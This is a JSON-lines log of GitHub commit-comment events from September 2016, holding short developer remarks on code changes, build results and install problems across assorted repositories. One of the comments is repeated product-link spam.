{"id":"4525613713","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"IOsonoTAN/koa-better-body"},"payload":{"comment":{"id":18923447,"position":6,"line":39,"path":"test/multipart.js","commit_id":"9efd3a8928ba60930017eacb0f85425500d65190","created_at":"2016-09-07T06:06:30Z","updated_at":"2016-09-07T06:06:30Z","body":"why?"}},"created_at":"2016-09-07T06:06:30Z"}
{"id":"4525615400","type":"CommitCommentEvent","actor":{"login":"indus"},"repo":{"name":"js-org/dns.js.org"},"payload":{"comment":{"id":18923452,"position":null,"line":null,"path":null,"commit_id":"38f7ec0a6d8c0a9f038376bedff1805e7ae5e428","created_at":"2016-09-07T06:07:08Z","updated_at":"2016-09-07T06:07:08Z","body":"#813"}},"created_at":"2016-09-07T06:07:08Z"}
{"id":"4525616326","type":"CommitCommentEvent","actor":{"login":"stachdude"},"repo":{"name":"docker-library/rabbitmq"},"payload":{"comment":{"id":18923453,"position":null,"line":null,"path":null,"commit_id":"006ad1e9c6c2e13803c972e4ebf38035a8c38ca3","created_at":"2016-09-07T06:07:26Z","updated_at":"2016-09-07T06:07:26Z","body":"To allow clustering\r\n\r\nFor DISC Node add\r\n```\r\n-e RABBITMQ_CLUSTER_NODES=\"{['rabbit@<hostname1.some.domain>', 'rabbit@<hostname2.some.domain>', 'rabbit@<hostnameN.some.domain>', disc}\"\r\n``` \r\nFor RAM Node add\r\n```\r\n-e RABBITMQ_CLUSTER_NODES=\"{['rabbit@<hostname1.some.domain>', 'rabbit@<hostname2.some.domain>', 'rabbit@<hostnameN.some.domain>', ram}\"\r\n``` "}},"created_at":"2016-09-07T06:07:26Z"}
{"id":"4525616653","type":"CommitCommentEvent","actor":{"login":"aszczecinski"},"repo":{"name":"BartlomiejAdamiak/JavaApiDoGier"},"payload":{"comment":{"id":18923454,"position":null,"line":null,"path":null,"commit_id":"283f4c2e09fb233ae88346ac1d27d04617172e95","created_at":"2016-09-07T06:07:33Z","updated_at":"2016-09-07T06:07:33Z","body":"Brakuje kilku rzeczy tutaj jeszcze, dodam jak wrócę z pracy. "}},"created_at":"2016-09-07T06:07:33Z"}
{"id":"4525616933","type":"CommitCommentEvent","actor":{"login":"ambloem"},"repo":{"name":"ambloem/Reddit-Keyboard"},"payload":{"comment":{"id":18923455,"position":10,"line":16,"path":"Reddit-KeyBoard.js","commit_id":"5dd44f7461ca9d0ed84d9d8a43ed7da1211357eb","created_at":"2016-09-07T06:07:39Z","updated_at":"2016-09-07T06:07:39Z","body":"Nope"}},"created_at":"2016-09-07T06:07:39Z"}
{"id":"4525616999","type":"CommitCommentEvent","actor":{"login":"LouisCAD"},"repo":{"name":"CodingDoug/white-label-event-app"},"payload":{"comment":{"id":18923456,"position":null,"line":null,"path":null,"commit_id":"917ff279febce1977635226fe9181cc1ff099656","created_at":"2016-09-07T06:07:41Z","updated_at":"2016-09-07T06:07:41Z","body":"Why aren't runnables reused? It would improve performance!"}},"created_at":"2016-09-07T06:07:41Z"}
{"id":"4525635062","type":"CommitCommentEvent","actor":{"login":"najidagher"},"repo":{"name":"dinosaadeh/Barjis"},"payload":{"comment":{"id":18923486,"position":11,"line":178,"path":"core/src/com/smb215team/barjis/game/GameController.java","commit_id":"3476027b4139814f16d2201585311c14b5047f66","created_at":"2016-09-07T06:13:48Z","updated_at":"2016-09-07T06:13:48Z","body":"No need to beg...bass it seems clear to me..shu badak faserlak tell me\n\nSent from my iPhone\n\n> On Sep 7, 2016, at 12:14 AM, Mohieddine SAADEH (Dino for short) <notifications@github.com> wrote:\n> \n> @najidagher I beg you let the code be clear and easy to read. I know it means nothing to you but it does to me.\n> \n> {\n>      dice.position.x = diceContainerLeft.borderLeft.x + 0.25f;\n>      dice.velocity.x = dice.velocity.x /3 ;\n> }\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-07T06:13:48Z"}
{"id":"4525635111","type":"CommitCommentEvent","actor":{"login":"jafdy"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18923487,"position":null,"line":null,"path":null,"commit_id":"71f4105a37f73968fe18cd4b63f49d62b723aad0","created_at":"2016-09-07T06:13:49Z","updated_at":"2016-09-07T06:13:49Z","body":"Can it still be damaged by blasts?"}},"created_at":"2016-09-07T06:13:49Z"}
{"id":"4525636153","type":"CommitCommentEvent","actor":{"login":"perlun"},"repo":{"name":"flori/tins"},"payload":{"comment":{"id":18923489,"position":null,"line":null,"path":null,"commit_id":"9ebb625d8a987bd54526006441ff97bc14c30e53","created_at":"2016-09-07T06:14:11Z","updated_at":"2016-09-07T06:14:11Z","body":"Coming in late here, but I just noted this change since this means that tins 1.7+ are uninstallable on older JRubies (1.7 which we are still not fully migrated away from).\r\n\r\nThe funny thing is that the new Hash syntax being used here is actually not Ruby 2.0, but 1.9. 😆 So this _could_ probably be changed to require 1.9 and newer..."}},"created_at":"2016-09-07T06:14:11Z"}
{"id":"4525637594","type":"CommitCommentEvent","actor":{"login":"tbrumm"},"repo":{"name":"bestpractical/rt"},"payload":{"comment":{"id":18923492,"position":null,"line":null,"path":null,"commit_id":"478f14544be9c9280c1134c059eedfadcb3cc513","created_at":"2016-09-07T06:14:37Z","updated_at":"2016-09-07T06:14:37Z","body":"Hi BPS,\r\nwould be good if this feature could be disabled if needed. In Germany it could trigger problems with Workers Council.\r\n\r\nGreetings\r\n\r\nTorsten"}},"created_at":"2016-09-07T06:14:37Z"}
{"id":"4525638073","type":"CommitCommentEvent","actor":{"login":"Wan-YunPeng"},"repo":{"name":"shellphish/shellphish-qemu"},"payload":{"comment":{"id":18923493,"position":null,"line":null,"path":null,"commit_id":"37176a385e62a99c17dd6f83c3b5459d5bee7b71","created_at":"2016-09-07T06:14:47Z","updated_at":"2016-09-07T06:14:47Z","body":" It says \"*** No rule to make target 'clean'. stop.\""}},"created_at":"2016-09-07T06:14:47Z"}
{"id":"4525640696","type":"CommitCommentEvent","actor":{"login":"inter-action"},"repo":{"name":"inter-action/algorithms_of_the_intelligent_web"},"payload":{"comment":{"id":18923495,"position":32,"line":29,"path":"src/main/scala/ch04/models.scala","commit_id":"32b698ae393d6f59d6b6f2f36f2a63bc1c5bc5c6","created_at":"2016-09-07T06:15:39Z","updated_at":"2016-09-07T06:15:39Z","body":"you cant write  [T : ClassTag] on trait, so this has to move down"}},"created_at":"2016-09-07T06:15:39Z"}
{"id":"4525645533","type":"CommitCommentEvent","actor":{"login":"Fengur"},"repo":{"name":"syedhali/EZAudio"},"payload":{"comment":{"id":18923511,"position":null,"line":null,"path":null,"commit_id":"98707d0cf11eba87cf641a7c0026fb9f117794c1","created_at":"2016-09-07T06:17:14Z","updated_at":"2016-09-07T06:17:14Z","body":"what a pity ,why not keep updating,you are really good"}},"created_at":"2016-09-07T06:17:14Z"}
{"id":"4525646465","type":"CommitCommentEvent","actor":{"login":"facelesspanda"},"repo":{"name":"jalenconner/custom-minimap-titles"},"payload":{"comment":{"id":18923512,"position":null,"line":null,"path":null,"commit_id":"ce9dd3112b26ab70619c7ca545b981eced41a1d9","created_at":"2016-09-07T06:17:33Z","updated_at":"2016-09-07T06:17:33Z","body":"Why did you remove the multiple formats supports?"}},"created_at":"2016-09-07T06:17:33Z"}
{"id":"4525651261","type":"CommitCommentEvent","actor":{"login":"kinlane"},"repo":{"name":"dret/webconcepts"},"payload":{"comment":{"id":18923524,"position":null,"line":null,"path":null,"commit_id":"b641b263de7e7c596a941415ca398379d987f736","created_at":"2016-09-07T06:19:09Z","updated_at":"2016-09-07T06:19:09Z","body":"I finally got time to import....it works for me....no problems with it.  Still working through content and organizing in my scheduling system...I will submit PR if I find anything."}},"created_at":"2016-09-07T06:19:09Z"}
{"id":"4525654285","type":"CommitCommentEvent","actor":{"login":"CodingDoug"},"repo":{"name":"CodingDoug/white-label-event-app"},"payload":{"comment":{"id":18923529,"position":null,"line":null,"path":null,"commit_id":"917ff279febce1977635226fe9181cc1ff099656","created_at":"2016-09-07T06:20:08Z","updated_at":"2016-09-07T06:20:08Z","body":"How would you make the passed snapshot or error object safely visible from a (singleton) Runnable without a race condition, if your Executor has multiple threads that don't have an order of execution guarantee?  Or, if you're suggesting object pooling, that's considered an anti-pattern for small objects - it's typically unwise to try to to outsmart the gc."}},"created_at":"2016-09-07T06:20:08Z"}
{"id":"4525656153","type":"CommitCommentEvent","actor":{"login":"YANGD72"},"repo":{"name":"kim-yongchan/JCake"},"payload":{"comment":{"id":18923541,"position":null,"line":null,"path":null,"commit_id":"c247022408d6e25105694dc51e6484f723165d04","created_at":"2016-09-07T06:20:42Z","updated_at":"2016-09-07T06:20:42Z","body":"comment?"}},"created_at":"2016-09-07T06:20:42Z"}
{"id":"4525657395","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":18923547,"position":null,"line":null,"path":null,"commit_id":"9109b36e0de674da39d648efedf531f82f0f9b17","created_at":"2016-09-07T06:21:06Z","updated_at":"2016-09-07T06:21:06Z","body":"TeamCity ReOpenLDAP :: devel [Build 308](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2781&buildTypeId=ReOpenLDAP_Devel&guest=1) outcome was **SUCCESS**\nSummary: Tests passed Build time: 02:15:53"}},"created_at":"2016-09-07T06:21:06Z"}
{"id":"4525657397","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":18923546,"position":null,"line":null,"path":null,"commit_id":"01b606df5e19f4892ef02e94e19b073737c4d07d","created_at":"2016-09-07T06:21:06Z","updated_at":"2016-09-07T06:21:06Z","body":"TeamCity ReOpenLDAP :: devel [Build 308](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2781&buildTypeId=ReOpenLDAP_Devel&guest=1) outcome was **SUCCESS**\nSummary: Tests passed Build time: 02:15:53"}},"created_at":"2016-09-07T06:21:06Z"}
{"id":"4525662134","type":"CommitCommentEvent","actor":{"login":"thezoggy"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":18923558,"position":null,"line":null,"path":null,"commit_id":"1157e498f01a787dff01e9ab3fb5610d60b60611","created_at":"2016-09-07T06:22:28Z","updated_at":"2016-09-07T06:22:28Z","body":"https://developer.rackspace.com/blog/the-not-so-sorry-state-of-ssl-in-python/\r\nhttps://wiki.python.org/moin/SSL\r\nhttps://stackoverflow.com/questions/18578439/using-requests-with-tls-doesnt-give-sni-support/18579484#18579484\r\n\r\nnow why arent we using python requests? \r\nhttp://docs.python-requests.org/en/master/community/faq/\r\n"}},"created_at":"2016-09-07T06:22:28Z"}
{"id":"4525667262","type":"CommitCommentEvent","actor":{"login":"LouisCAD"},"repo":{"name":"CodingDoug/white-label-event-app"},"payload":{"comment":{"id":18923570,"position":null,"line":null,"path":null,"commit_id":"917ff279febce1977635226fe9181cc1ff099656","created_at":"2016-09-07T06:23:54Z","updated_at":"2016-09-07T06:23:54Z","body":"Hum, would only work for single thread executors I guess. Maybe not a good\nidea in this case finally. BTW, why are Executors needed? Isn't Firebase\nclever enough to do it OOB with just a parameter, as seen in Agera (An\nAndroid Library by Google)?\n\nOn Wed, Sep 7, 2016, 8:20 AM Doug Stevenson <notifications@github.com>\nwrote:\n\n> How would you make the passed snapshot or error object safely visible from\n> a (singleton) Runnable without a race condition, if your Executor has\n> multiple threads that don't have an order of execution guarantee? Or, if\n> you're suggesting object pooling, that's considered an anti-pattern for\n> small objects - it's typically unwise to try to to outsmart the gc.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/CodingDoug/white-label-event-app/commit/917ff279febce1977635226fe9181cc1ff099656#commitcomment-18923529>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGpvBQNoylaEG5R_VXApxBu2fz3RSAlVks5qnleZgaJpZM4J2kPr>\n> .\n>\n"}},"created_at":"2016-09-07T06:23:54Z"}
{"id":"4525669327","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18923574,"position":null,"line":null,"path":null,"commit_id":"772fea05998847b2e1c25ead46ef01332c506b96","created_at":"2016-09-07T06:24:29Z","updated_at":"2016-09-07T06:24:29Z","body":"Note that it still appears as \"display_details\" in common.ml."}},"created_at":"2016-09-07T06:24:29Z"}
{"id":"4525669697","type":"CommitCommentEvent","actor":{"login":"Sleet01"},"repo":{"name":"Sleet01/Sleet01.github.io"},"payload":{"comment":{"id":18923577,"position":null,"line":null,"path":null,"commit_id":"be3414feb5379c239813e8974b3cf0e1148b3cc3","created_at":"2016-09-07T06:24:35Z","updated_at":"2016-09-07T06:24:35Z","body":"Roll back 0.0.4"}},"created_at":"2016-09-07T06:24:35Z"}
{"id":"4525680227","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18923594,"position":null,"line":null,"path":null,"commit_id":"367366e424ec2c696d2e175d34a44efc3b2f2f77","created_at":"2016-09-07T06:27:39Z","updated_at":"2016-09-07T06:27:39Z","body":"One thing that annoys me about moving so much to display.ml is that display.ml is a very prominent dependency. There are now quite a few functions in there which are really only needed by main.ml, so I think we should separate them into yet another module.\r\n\r\nThat way all the stuff that is required by typer.ml and typeload.ml can remain in display.ml, whereas all the output handling is in another module."}},"created_at":"2016-09-07T06:27:39Z"}
{"id":"4525680294","type":"CommitCommentEvent","actor":{"login":"gho1b"},"repo":{"name":"gho1b/hello-world"},"payload":{"comment":{"id":18923595,"position":1,"line":1,"path":"README.md","commit_id":"3c5e84495355b3b23933917e6fe315ab82cb0839","created_at":"2016-09-07T06:27:40Z","updated_at":"2016-09-07T06:27:40Z","body":"Pertama kali ngisi"}},"created_at":"2016-09-07T06:27:40Z"}
{"id":"4525680362","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.drafts"},"payload":{"comment":{"id":18923596,"position":null,"line":null,"path":null,"commit_id":"bbcd56da949be8dc0ee9c4555e9284831967475f","created_at":"2016-09-07T06:27:42Z","updated_at":"2016-09-07T06:27:42Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.drafts/17/violations\n```\nplone/app/drafts/dexterity.py:142:1: C901 'autosave' is too complex (15)\nplone/app/drafts/tests.py:1135:15: S001 found % formatter\nplone/app/drafts/tests.py:1175:15: S001 found % formatter\nplone/app/drafts/tests.py:1222:13: P101 format string does contain unindexed parameters\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-07T06:27:42Z"}
{"id":"4525682119","type":"CommitCommentEvent","actor":{"login":"gho1b"},"repo":{"name":"gho1b/hello-world"},"payload":{"comment":{"id":18923602,"position":null,"line":null,"path":null,"commit_id":"3c5e84495355b3b23933917e6fe315ab82cb0839","created_at":"2016-09-07T06:28:14Z","updated_at":"2016-09-07T06:28:14Z","body":"Commit pertama kali"}},"created_at":"2016-09-07T06:28:14Z"}
{"id":"4525682393","type":"CommitCommentEvent","actor":{"login":"CodingDoug"},"repo":{"name":"CodingDoug/white-label-event-app"},"payload":{"comment":{"id":18923605,"position":null,"line":null,"path":null,"commit_id":"917ff279febce1977635226fe9181cc1ff099656","created_at":"2016-09-07T06:28:20Z","updated_at":"2016-09-07T06:28:20Z","body":"Firebase Database currently executes all callbacks on the main thread.  Typical app usage is to update the UI in direct response to a db change.  However, that doesn't suit all cases (as in my case where I have sizable data to parse and potentially multiple listeners).  There is an outstanding issue to allow an Executor to be passed at the time of listener registration (like the Play services Task API), but until that change hits production, this is the best we've got."}},"created_at":"2016-09-07T06:28:20Z"}
{"id":"4525689449","type":"CommitCommentEvent","actor":{"login":"qing606"},"repo":{"name":"bigfa/Bur"},"payload":{"comment":{"id":18923627,"position":4,"line":6,"path":"archive.php","commit_id":"c6cf306e20fa8b25719e9b0ba0cc139a0f2522b8","created_at":"2016-09-07T06:30:28Z","updated_at":"2016-09-07T06:30:28Z","body":"问题没解决啊"}},"created_at":"2016-09-07T06:30:28Z"}
{"id":"4525695811","type":"CommitCommentEvent","actor":{"login":"bigfa"},"repo":{"name":"bigfa/Bur"},"payload":{"comment":{"id":18923642,"position":4,"line":6,"path":"archive.php","commit_id":"c6cf306e20fa8b25719e9b0ba0cc139a0f2522b8","created_at":"2016-09-07T06:32:26Z","updated_at":"2016-09-07T06:32:26Z","body":"啥玩意没解决？\n\n2016年9月7日星期三，ericlin <notifications@github.com> 写道：\n\n> 问题没解决啊\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/bigfa/Bur/commit/c6cf306e20fa8b25719e9b0ba0cc139a0f2522b8#commitcomment-18923627>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AC75dL6N7b0pkLgJK1tc-GQKQjA7D8C_ks5qnloEgaJpZM4J2lES>\n> .\n>\n"}},"created_at":"2016-09-07T06:32:26Z"}
{"id":"4525697551","type":"CommitCommentEvent","actor":{"login":"longhotsummer"},"repo":{"name":"Code4SA/pmg-cms-2"},"payload":{"comment":{"id":18923645,"position":1,"line":1,"path":"pmg/static/resources/javascript/committees.js","commit_id":"873c78ec550bfe3473dab026dfd5946e16e3c61c","created_at":"2016-09-07T06:33:00Z","updated_at":"2016-09-07T06:33:00Z","body":"Bootstrap handles this, see below"}},"created_at":"2016-09-07T06:33:00Z"}
{"id":"4525699095","type":"CommitCommentEvent","actor":{"login":"longhotsummer"},"repo":{"name":"Code4SA/pmg-cms-2"},"payload":{"comment":{"id":18923648,"position":9,"line":10,"path":"pmg/templates/committee_list.html","commit_id":"873c78ec550bfe3473dab026dfd5946e16e3c61c","created_at":"2016-09-07T06:33:28Z","updated_at":"2016-09-07T06:33:28Z","body":"the `data-toggle=\"tab\"` attrib should be on the `a` tag, then bootstrap handles everything for us."}},"created_at":"2016-09-07T06:33:28Z"}
{"id":"4525699358","type":"CommitCommentEvent","actor":{"login":"Glease"},"repo":{"name":"FrogCraft-Rebirth/OmniOcular"},"payload":{"comment":{"id":18923649,"position":null,"line":null,"path":null,"commit_id":"7623a1e3a44a1a8f5fb8de7bc832cf95574bd083","created_at":"2016-09-07T06:33:33Z","updated_at":"2016-09-07T06:33:33Z","body":"And, btw, Kotlin embed compiler is 21.4MB. Bigger than anything. May not be a good idea to use kotlin at all :disappointed: Maybe scala is better... or worse to some other extension."}},"created_at":"2016-09-07T06:33:33Z"}
{"id":"4525699443","type":"CommitCommentEvent","actor":{"login":"dpmramesh"},"repo":{"name":"sabose/ovirt-site"},"payload":{"comment":{"id":18923650,"position":63,"line":63,"path":"source/develop/release-management/features/gluster/gluster-dr.html.md","commit_id":"70e2e036df0474f955e3c93b6c4ed9cefdf416bc","created_at":"2016-09-07T06:33:35Z","updated_at":"2016-09-07T06:33:35Z","body":"@sabose Will it be useful to show the slave volume info under the storage domain."}},"created_at":"2016-09-07T06:33:35Z"}
{"id":"4525700027","type":"CommitCommentEvent","actor":{"login":"JacobStoren"},"repo":{"name":"OPM/ResInsight"},"payload":{"comment":{"id":18923653,"position":null,"line":null,"path":null,"commit_id":"8c67ee0a0d48325843d74243f0f1d2029c21689a","created_at":"2016-09-07T06:33:45Z","updated_at":"2016-09-07T06:33:45Z","body":"This should have been fixed (a couple of times) already, with a similar fix. Both in 8098578545317026ad0847a1e177c662d605486f and hopefully finally in ca6e650a72c5edf0c3bd40bee0c09be103de39db\r\n\r\nBut neither addresses the real problem, which is a linux-only behavior, just guards against it.\r\nThe real problem is not very important, though, as it seems to be a transient."}},"created_at":"2016-09-07T06:33:45Z"}
{"id":"4525700826","type":"CommitCommentEvent","actor":{"login":"Danielbook"},"repo":{"name":"Danielbook/kulan2016"},"payload":{"comment":{"id":18923655,"position":null,"line":null,"path":null,"commit_id":"5c42c2bf092770f4235832667f7f28f8e4bc100d","created_at":"2016-09-07T06:34:01Z","updated_at":"2016-09-07T06:34:01Z","body":"Alright, I'll fix that 👍 "}},"created_at":"2016-09-07T06:34:01Z"}
{"id":"4525701224","type":"CommitCommentEvent","actor":{"login":"longhotsummer"},"repo":{"name":"Code4SA/pmg-cms-2"},"payload":{"comment":{"id":18923656,"position":24,"line":25,"path":"pmg/templates/committee_list.html","commit_id":"873c78ec550bfe3473dab026dfd5946e16e3c61c","created_at":"2016-09-07T06:34:09Z","updated_at":"2016-09-07T06:34:09Z","body":"The row and the col-xs-12 are unnecessary and can be nuked."}},"created_at":"2016-09-07T06:34:09Z"}
{"id":"4525702109","type":"CommitCommentEvent","actor":{"login":"dpmramesh"},"repo":{"name":"sabose/ovirt-site"},"payload":{"comment":{"id":18923659,"position":61,"line":61,"path":"source/develop/release-management/features/gluster/gluster-dr.html.md","commit_id":"70e2e036df0474f955e3c93b6c4ed9cefdf416bc","created_at":"2016-09-07T06:34:23Z","updated_at":"2016-09-07T06:34:23Z","body":"This image link is not working. I think image file is missing the .png extension"}},"created_at":"2016-09-07T06:34:23Z"}
{"id":"4525706853","type":"CommitCommentEvent","actor":{"login":"chrisbuerk"},"repo":{"name":"chrisbuerk/okenlist"},"payload":{"comment":{"id":18923665,"position":2,"line":null,"path":"README.md","commit_id":"431d8fe89a3055f41b1aa0b4fdab34019cb51dac","created_at":"2016-09-07T06:35:48Z","updated_at":"2016-09-07T06:35:48Z","body":"Mit Abiturtabellen für Baden-Württemberg "}},"created_at":"2016-09-07T06:35:48Z"}
{"id":"4525707362","type":"CommitCommentEvent","actor":{"login":"bjcarne"},"repo":{"name":"bjcarne/pySX127x"},"payload":{"comment":{"id":18923667,"position":null,"line":null,"path":null,"commit_id":"f38705061a27b839131ee93486284e5c98151c84","created_at":"2016-09-07T06:35:56Z","updated_at":"2016-09-07T06:35:56Z","body":"Occasionally, yes. I find that if a large payload is being sent which needs to be broken up into a number of LoRa transmissions there is a chance that the receiving device may try to send a payload and take the module out of RX mode. If this occurs during the large payload transmission from the other device then one of the payload segments may be lost. It really depends on your use case as to whether this is likely to be an issue for you."}},"created_at":"2016-09-07T06:35:56Z"}
{"id":"4525710302","type":"CommitCommentEvent","actor":{"login":"JacobStoren"},"repo":{"name":"OPM/ResInsight"},"payload":{"comment":{"id":18923670,"position":null,"line":null,"path":null,"commit_id":"8c67ee0a0d48325843d74243f0f1d2029c21689a","created_at":"2016-09-07T06:36:51Z","updated_at":"2016-09-07T06:36:51Z","body":"Sorry, I see that you already have tested the ca6e650 fix. We will need to look at it in more detail."}},"created_at":"2016-09-07T06:36:51Z"}
{"id":"4525712067","type":"CommitCommentEvent","actor":{"login":"IliyaNovikov"},"repo":{"name":"jsonfx/jsonfx"},"payload":{"comment":{"id":18923673,"position":null,"line":null,"path":null,"commit_id":"b4f351deefeb03ca32a987f07a99960a239d245f","created_at":"2016-09-07T06:37:19Z","updated_at":"2016-09-07T06:37:19Z","body":"Hello. With this commit the project won't compile for .Net 3.5. ISet was introduced in .Net version 4.0"}},"created_at":"2016-09-07T06:37:19Z"}
{"id":"4525713682","type":"CommitCommentEvent","actor":{"login":"killermosi"},"repo":{"name":"pmprog/OpenApoc"},"payload":{"comment":{"id":18923676,"position":null,"line":null,"path":null,"commit_id":"1334e4e8a9bb1f15b0af529f2f08f9bb0fafc073","created_at":"2016-09-07T06:37:47Z","updated_at":"2016-09-07T06:37:47Z","body":"Now THAT's progress!! :+1: "}},"created_at":"2016-09-07T06:37:47Z"}
{"id":"4525716012","type":"CommitCommentEvent","actor":{"login":"Safihre"},"repo":{"name":"sabnzbd/sabnzbd"},"payload":{"comment":{"id":18923683,"position":null,"line":null,"path":null,"commit_id":"1157e498f01a787dff01e9ab3fb5610d60b60611","created_at":"2016-09-07T06:38:25Z","updated_at":"2016-09-07T06:38:25Z","body":"> now why arent we using python requests? \r\n\r\nThis doesn't apply to NTTPS, only HTTPS, right? "}},"created_at":"2016-09-07T06:38:25Z"}
{"id":"4525716545","type":"CommitCommentEvent","actor":{"login":"Wan-YunPeng"},"repo":{"name":"shellphish/shellphish-qemu"},"payload":{"comment":{"id":18923685,"position":null,"line":null,"path":null,"commit_id":"37176a385e62a99c17dd6f83c3b5459d5bee7b71","created_at":"2016-09-07T06:38:35Z","updated_at":"2016-09-07T06:38:35Z","body":"Can you tell me how to install shellphish-qemu successfully? I have been work on this for nearly two weeks, and I haven't done it yet..."}},"created_at":"2016-09-07T06:38:35Z"}
{"id":"4525717017","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18923686,"position":null,"line":null,"path":null,"commit_id":"3b0788ea6ed9a312d62a06dbe1dd531bfc9cba2d","created_at":"2016-09-07T06:38:43Z","updated_at":"2016-09-07T06:38:43Z","body":"y not just 2.4?"}},"created_at":"2016-09-07T06:38:43Z"}
{"id":"4525717765","type":"CommitCommentEvent","actor":{"login":"gimsieke"},"repo":{"name":"transpect/docx2hub"},"payload":{"comment":{"id":18923687,"position":5,"line":197,"path":"xsl/numbering.xsl","commit_id":"207c6aa1e302e9d8fce6cfcdef923f20bfee71a9","created_at":"2016-09-07T06:38:57Z","updated_at":"2016-09-07T06:38:57Z","body":"@pglatza fixed this (credit where credit is due…)"}},"created_at":"2016-09-07T06:38:57Z"}
{"id":"4525724757","type":"CommitCommentEvent","actor":{"login":"syifaazzahra"},"repo":{"name":"syifaazzahra/eyecare"},"payload":{"comment":{"id":18923700,"position":null,"line":null,"path":null,"commit_id":"0a85497cad94cf5738e7367f445e620c7def8b41","created_at":"2016-09-07T06:41:05Z","updated_at":"2016-09-07T06:41:05Z","body":"[eye care softgel](http://greenworldstore.net/eye-care-softgel/) [eye care softgel](http://greenworldstore.net/eye-care-softgel/) [eye care softgel](http://greenworldstore.net/eye-care-softgel/) [eye care softgel](http://greenworldstore.net/eye-care-softgel/) [eye care softgel](http://greenworldstore.net/eye-care-softgel/) [eye care softgel](http://greenworldstore.net/eye-care-softgel/) [eye care softgel](http://greenworldstore.net/eye-care-softgel/) [eye care softgel](http://greenworldstore.net/eye-care-softgel/) [eye care softgel](http://greenworldstore.net/eye-care-softgel/) [eye care softgel](http://greenworldstore.net/eye-care-softgel/) [eye care softgel](http://greenworldstore.net/eye-care-softgel/) "}},"created_at":"2016-09-07T06:41:05Z"}
{"id":"4525727695","type":"CommitCommentEvent","actor":{"login":"arf1372"},"repo":{"name":"utailab/cs-portal"},"payload":{"comment":{"id":18923709,"position":null,"line":null,"path":null,"commit_id":"0028a3bd9993b548aabb814aed446f91eb57412a","created_at":"2016-09-07T06:41:58Z","updated_at":"2016-09-07T06:41:58Z","body":"There is sth named detailview in django\r\nI prefer that one over passing vars to templates!"}},"created_at":"2016-09-07T06:41:58Z"}
{"id":"4525727955","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18923710,"position":null,"line":null,"path":null,"commit_id":"e468813fc032c5558eb3f384b2d886e919d7515b","created_at":"2016-09-07T06:42:03Z","updated_at":"2016-09-07T06:42:03Z","body":"I don't understand this. It's the only reliable way to set the project name. And this is the guide project. Why is it adding extra overhead? You don't need the _settings.gradle_ to understand the project."}},"created_at":"2016-09-07T06:42:03Z"}
{"id":"4525729507","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18923713,"position":null,"line":null,"path":null,"commit_id":"f4c33f69696b8e032f2a1f2e282d11c7a43a9767","created_at":"2016-09-07T06:42:31Z","updated_at":"2016-09-07T06:42:31Z","body":"This commit takes advantage of GCC 6.0's Strict Bounds Checking sanitizer."}},"created_at":"2016-09-07T06:42:31Z"}
{"id":"4525733337","type":"CommitCommentEvent","actor":{"login":"NeatElves"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":18923719,"position":null,"line":null,"path":null,"commit_id":"d976654a291dbb53497751f92af1c48c5678ced8","created_at":"2016-09-07T06:43:37Z","updated_at":"2016-09-07T06:43:37Z","body":"You may want to add?)\r\n```sql\r\n(17077,3,7,11719,0,0,0,0,0,0,0,0,0,0,0,0,'quest complete');\r\n```\r\n"}},"created_at":"2016-09-07T06:43:37Z"}
{"id":"4525737173","type":"CommitCommentEvent","actor":{"login":"ozyx"},"repo":{"name":"SaddlebackCSS/SaddlebackCSS.github.io"},"payload":{"comment":{"id":18923726,"position":13,"line":13,"path":"_posts/2016-90-06-python-oclug.md","commit_id":"064e4d4c6f15fa7692c72e7a3351efb6b478922e","created_at":"2016-09-07T06:44:43Z","updated_at":"2016-09-07T06:44:43Z","body":"Saw this post, included it in the \"Events\" section of the SCSS newsletter sending out tomorrow at 7AM! :D"}},"created_at":"2016-09-07T06:44:43Z"}
{"id":"4525739832","type":"CommitCommentEvent","actor":{"login":"arf1372"},"repo":{"name":"utailab/cs-portal"},"payload":{"comment":{"id":18923730,"position":null,"line":null,"path":null,"commit_id":"0028a3bd9993b548aabb814aed446f91eb57412a","created_at":"2016-09-07T06:45:33Z","updated_at":"2016-09-07T06:45:33Z","body":"Also get or 404 is a friend shortcut"}},"created_at":"2016-09-07T06:45:33Z"}
